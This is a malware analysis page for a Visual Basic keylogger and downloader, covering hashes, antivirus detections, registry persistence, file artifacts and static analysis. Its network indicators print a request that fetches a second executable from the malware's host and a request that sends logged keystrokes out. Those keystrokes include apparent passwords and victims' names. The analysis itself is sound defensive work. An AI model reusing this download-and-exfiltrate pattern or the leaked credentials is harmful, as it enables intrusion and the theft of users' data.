607408678014f9d5c3d6aba4572db018

From aldeid
Jump to: navigation, search

Description

Summary

  • This malware has been written in VisualBasic (VB)
  • It achieves persistence by adding an entry in the startup registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Run\System32)
  • It attempts to get another executable (habeys.exe) from www.hoarafushionline.net

Identification

MD5  607408678014f9d5c3d6aba4572db018
SHA1  455a066dad59e06a4a5db6f54657bd6b5292acfc
SHA256  062ca7b27c517f9449d5d2e6eeecaf9a1aab467f177754651f0998bcc55af98f
ssdeep  768:6v8s3i6E5nXfUWPYfIc/Qi3qEBQpgCqr5YwQsUBVaBKYaZUsp93qEBjUWPYfIc/4:E3i6EBXlLOUpgC2YwofaBKX2sp9NLh
imphash  7f88c9db546824c7d65dad8e27b90958
File name
  • user.exe
  • APS.exe
File size  64.0 KB ( 65536 bytes )
File type  Win32 EXE
Magic literal  PE32 executable for MS Windows (GUI) Intel 80386 32-bit
TrID
  • Win32 Executable (generic) (52.9%)
  • Generic Win/DOS Executable (23.5%)
  • DOS Executable Generic (23.4%)
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (0.0%)

Antivirus detection

Antivirus Result Update
Ad-Aware Gen:Trojan.Heur.ZGY.5 20140410
AegisLab 20140410
Agnitum Worm.WBNA!MU9DAqxp0M8 20140409
AhnLab-V3 Trojan/Win32.Cossta 20140409
AntiVir Worm/Psyokym.A.34 20140410
Antiy-AVL Trojan[Downloader]/Win32.Genome 20140409
Avast Win32:Malware-gen 20140410
AVG Generic30.CICN 20140410
Baidu-International Trojan.Win32.Genome.aEPz 20140410
BitDefender Gen:Trojan.Heur.ZGY.5 20140410
Bkav W32.WintaskLTH.Trojan 20140410
ByteHero 20140410
CAT-QuickHeal Worm.Psyokym.A3 20140410
ClamAV 20140410
CMC Heur.Win32.Veebee.1!O 20140410
Commtouch W32/VB.KW.gen!Eldorado 20140410
Comodo Worm.Win32.VB.mrb 20140410
DrWeb Trojan.DownLoader5.33626 20140410
Emsisoft Gen:Trojan.Heur.ZGY.5 (B) 20140410
ESET-NOD32 a variant of Win32/AutoRun.VB.ATP 20140410
F-Prot W32/VB.KW.gen!Eldorado 20140410
F-Secure Gen:Trojan.Heur.ZGY.5 20140410
Fortinet W32/Genome.DAOD!tr 20140410
GData Gen:Trojan.Heur.ZGY.5 20140410
Ikarus Trojan-Downloader.Win32.Genome 20140410
Jiangmin TrojanDownloader.Genome.aged 20140410
K7AntiVirus Trojan ( 0040f2601 ) 20140409
K7GW Trojan ( 0040f2601 ) 20140409
Kaspersky Worm.Win32.WBNA.amix 20140410
Kingsoft Win32.TrojDownloader.Genome.(kcloud) 20140410
Malwarebytes Backdoor.Agent 20140410
McAfee RDN/Autorun.worm!dh 20140410
McAfee-GW-Edition RDN/Autorun.worm!dh 20140410
Microsoft Worm:Win32/Psyokym.A 20140410
MicroWorld-eScan Gen:Trojan.Heur.ZGY.5 20140410
NANO-Antivirus Trojan.Win32.Genome.beayii 20140410
Norman AutoRun.BVJS 20140410
nProtect Worm/W32.WBNA.65536.O 20140410
Panda Generic Trojan 20140410
Qihoo-360 HEUR/Malware.QVM03.Gen 20140410
Rising PE:Trojan.DL.Win32.Hoara.a!1075351165 20140410
Sophos W32/Psyke-A 20140410
SUPERAntiSpyware Trojan.Agent/Gen-Autorun 20140410
Symantec W32.SillyFDC 20140410
TheHacker Trojan/Downloader.Genome.daod 20140408
TotalDefense 20140410
TrendMicro Mal_OtorunP 20140410
TrendMicro-HouseCall TROJ_GEN.F47V0317 20140410
VBA32 TrojanDownloader.Genome 20140410
VIPRE Trojan.Win32.Cossta.shu (v) 20140410
ViRobot Trojan.Win32.Downloader.189952.AV 20140410

Links

Artifacts

Persistence

The malware achieves persistence by adding the following registry key:

Key HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Name System32
Type REG_SZ
Value C:\Documents and Settings\All Users\Application Data\malware.exe
Info.png
Note
The value in yellow is replaced by the username of the logged in user.

Reset hidden files and file extensions visibility

The malware attempts to hide itself by resetting the hidden files and extensions explorer options:

Key Name Type Value
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden REG_DWORD 0x00000000
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced HideFileExt REG_DWORD 0x00000001

Files

The malware copies itself to

%ALLUSERSPROFILE%\Application Data\%username%.exe

Following encrypted file is also generated:

%homepath%\Local Settings\Temp\~DFBAE.tmp

Mutexes

Incomplete.png
INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.

Network indicators

The malware attempts to gather another executable from www.hoarafushionline.net but since the website is dead, we haven't been able to analyze this file.

GET /habeys.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: www.hoarafushionline.net
Connection: Keep-Alive

It seems that an infected machine also sends such requests:

GET http://www.hoarafushionline.net/extract.php?x=?v....%20%20*****%20%2009-04-2014/09:19:55%20||%20%20:%20%20--%20.%20%20*****%20%2009-04-2014/09:19:57%20||%20Microsoft%20PowerPoint%20-%20[TT%20Doubles%20Fixtures%20[Compatibility%20Mode]]%20:%20%20--%20?b...?ac[%20%20*****%20%2009-04-2014/09:20:34%20||%20%20:%20%20--%20..%20%20*****%20%2009-04-2014/09:20:36%20||%20NotesLogo%20:%20%20--%20..?Passw123%20%20*****%20%20%20%20*****%20%2009-04-2014/09:20:42%20||%20Workspace%20-%20IBM%20Lotus%20Notes%20:%20%20--%20.%20%20*****%20%2009-04-2014/09:20:50%20||%20Mail%20-%20IBM%20Lotus%20Notes%20:%20%20--%20.%20%20*****%20%2009-04-2014/09:20:57%20||%20New%20Message%20-%20IBM%20Lotus%20Notes%20:%20%20--%20..?Hi%20.?William?%20%20*****%20%20%20%20*****%20%20%20%20*****%20%20..?From%20.?Sprts%20committee%20.'o..%20%20*****%20%2009-04-2014/09:21:39%20||%20Registry%20Optimizer%20:%20%20--%20or.id?%20send%20a%20reminder%20to%20all%20these%20players%20for%20todays.?s%20match.%20.?TT%20.?Double?s.%20and%20keep%20ur%20committee%20members%20in%20cc%20%20*****%20%20%20%20*****%20%20.?v..?TT%20.?Doun.ble?s%20reminder.diwakar..%20%20*****%20%2009-04-2014/09:23:20%20||%20TT%20Double's%20reminder%20-%20IBM%20Lotus%20Notes%20:%20%20--%20..%20%20*****%20%2009-04-2014/09:23:33%20||%20IBM%20Lotus%20Notes%20:%20%20--%20.%20%20*****%20%2009-04-2014/09:23:33%20||%20Mail%20-%20Inbox%20-%20IBM%20Lotus%20Notes%20:%20%20--%20.%20%20*****%20%2009-04-2014/09:23:36%20||%20Mail%20-%20Inbox%20-%20IBM%20Lotus%20Notes%20:%20%20--%20.%20%20*****%20%2009-04-2014/09:23:40%20||%20%20:%20%20--%20.gladiator17%20%20*****%20%20.&ip=10.0.0.41&un=USER4562&exe=5372 HTTP/1.1
User-Agent: VB OpenUrl
Host: www.hoarafushionline.net
Pragma: no-cache
Cookie: vsid=914vr1432639559823845; _sm_au_d=1

Static Analysis

Version information

Translation: 0x0409 0x04b0
InternalName: APS
FileVersion: 1.00
CompanyName: Microsoft
ProductName: ysp
ProductVersion: 1.00
FileDescription: Photo
OriginalFilename: APS.exe

Sections

Name       VirtAddr     VirtSize     RawSize      Entropy     
--------------------------------------------------------------------------------
.text      0x1000       0xa44c       0xb000       4.796745    
.data      0xc000       0xc68        0x0          0.000000    [SUSPICIOUS]
.rsrc      0xd000       0xe000       0xe000       4.552983    
xabofet    0x1b000      0x1000       0x0          0.000000    [SUSPICIOUS]

Resources

Name               RVA      Size     Lang         Sublang                  Type
--------------------------------------------------------------------------------
RT_ICON            0x1309c  0x668    LANG_NEUTRAL SUBLANG_NEUTRAL          empty
RT_ICON            0x12db4  0x2e8    LANG_NEUTRAL SUBLANG_NEUTRAL          empty
RT_ICON            0x12c8c  0x128    LANG_NEUTRAL SUBLANG_NEUTRAL          empty
RT_ICON            0x11de4  0xea8    LANG_NEUTRAL SUBLANG_NEUTRAL          empty
RT_ICON            0x1153c  0x8a8    LANG_NEUTRAL SUBLANG_NEUTRAL          empty
RT_ICON            0x10fd4  0x568    LANG_NEUTRAL SUBLANG_NEUTRAL          GLS_BINARY_LSB_FIRST
RT_ICON            0xea2c   0x25a8   LANG_NEUTRAL SUBLANG_NEUTRAL          data
RT_ICON            0xd984   0x10a8   LANG_NEUTRAL SUBLANG_NEUTRAL          data
RT_ICON            0xd51c   0x468    LANG_NEUTRAL SUBLANG_NEUTRAL          GLS_BINARY_LSB_FIRST
RT_GROUP_ICON      0xd498   0x84     LANG_NEUTRAL SUBLANG_NEUTRAL          MS Windows icon resource - 9 icons, 48x48, 16-colors
RT_VERSION         0xd270   0x228    LANG_ENGLISH SUBLANG_ENGLISH_US       data

IAT

MSVBVM60.dll

  • MethCallEngine
  • rtcLowerCaseVar
  • rtcTrimBstr
  • rtcMsgBox
  • rtcMidCharBstr
  • rtcMidCharVar
  • rtcSpaceBstr
  • rtcSpaceVar
  • EVENT_SINK_AddRef
  • DllFunctionCall
  • EVENT_SINK_Release
  • EVENT_SINK_QueryInterface
  • __vbaExceptHandler
  • rtcReplace
  • rtcVarBstrFromAnsi
  • ProcCallEngine
  • rtcStrFromVar
  • rtcFileCopy
  • ThunRTMain
  • rtcGetDateVar
  • rtcGetTimeVar
  • rtcLeftCharBstr
  • rtcLeftCharVar

Strings

&.ED
frmMain
My YPS  - KeyLogger
333;
333;
333;
333;
333;
333;
333;
3330
3333
3330
3333
3330
33333
}}}}
~}}}}
RTVVjrqmjr}
~}}}}
!/9?NGGaaq^^^m
~~}}}
+388<<a^^^^]^
#%88<Ca[]]]]]
#%CCZ[^\\\]
#%<[[^^\\]
#%<_a[^^^\^
#%<<aa^^^^^
##<_am^m^^m
"%%8D<aabm^^m
#-8<Iaammmmm
"#%89addammmr
$-8<Gdnmmmj
$-8GIdnnjrr
$-8GGhnsrr}
$-9Gdhnszz
$-9GGggs}s
+-9Ghgys
$1;GVvys
+/GSiiyy
+/?Tiv
 +1AV
,?NYi
 ,6RT
!,6R
+.?R
+5AR
!.6RY
+/NR
-6RR
+6NR
$4?R
uwxz.4DC\JJMU
'*  KJJJ;t
mojj
 99MJJBy
  9KJJJ\
9#KMJJ\
  =LMOO`
*1=R\QQc
*<=UUQ\h
*@@VU```g
[email protected]`m
'2FCaccm
3F[Yam
(3H[a
7F:+%
>NF:+
>RNF:
AYRNF
21!i%
A]YRN
442i#
S`]YR
%@74i%
Sb`]g
([email protected]@=%
Tcb`j
:TOJ7Q
Tccbk 
:]XX7
Vcccl#
<^]Y7
Vcccl),Fbb_:
Vccll7,bheb:
Vcj[S/dhhhbH
_VTTTPJJJBH
#MgR'Qj.(Vq
 Lhh(QjT/SiB3Sh'5Ti
Lit%Qla-TkM3Ti>5Sf85Qd(6Rf
Liz$Qli,UmU2VlD5Ti:5Rf55Qd1Y
Li|#Qmo+Un\Fs
%Jc_(Nf/)Sl
Hc}(Nfg1QfL4Qd%5Th
%Mgr.RhY4RfE5Qd:f
*>FE
*>EP
Form1
Timer3
Timer1
&.ED
VB5!
frmMain
Module1
&.ED
>dc^
Timer3
C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Form
Timer1
user32
GetKeyState
GetAsyncKeyState
GetActiveWindow
GetForegroundWindow
GetWindowTextA
GetWindowTextLengthA
wininet.dll
InternetGetConnectedStateEx
InternetOpenUrlA
InternetOpenA
kernel32
CopyFileA
GetSystemDirectoryA
advapi32.dll
RegCreateKeyA
RegSetValueExA
RegCloseKey
kernel32.dll
SetFileAttributesA
GetDriveTypeA
RegOpenKeyA
FindFirstFileA
GetUserNameA
RegOpenKeyExA
GetCurrentProcessId
DeleteFileA
OpenFile
shell32.dll
ShellExecuteA
urlmon
URLDownloadToFileA
SetRegistryValue
sysPath
CheckInternetConnection
GetActiveTitle
WSOCK32.DLL
WSAGetLastError
WSAStartup
WSACleanup
gethostname
gethostbyname
RtlMoveMemory
GetCurrentProcess
GetCurrentThread
GetCurrentThreadId
SetThreadPriority
GetThreadPriority
GetWindowThreadProcessId
OpenProcess
SetPriorityClass
GetPriorityClass
CloseHandle
SHGetSpecialFolderPathA
VBA6.DLL
hKey
KeyName
ValueName
value
MSVBVM60.DLL
MethCallEngine
EVENT_SINK_AddRef
DllFunctionCall
EVENT_SINK_Release
EVENT_SINK_QueryInterface
__vbaExceptHandler
ProcCallEngine


Comments

blog comments powered by Disqus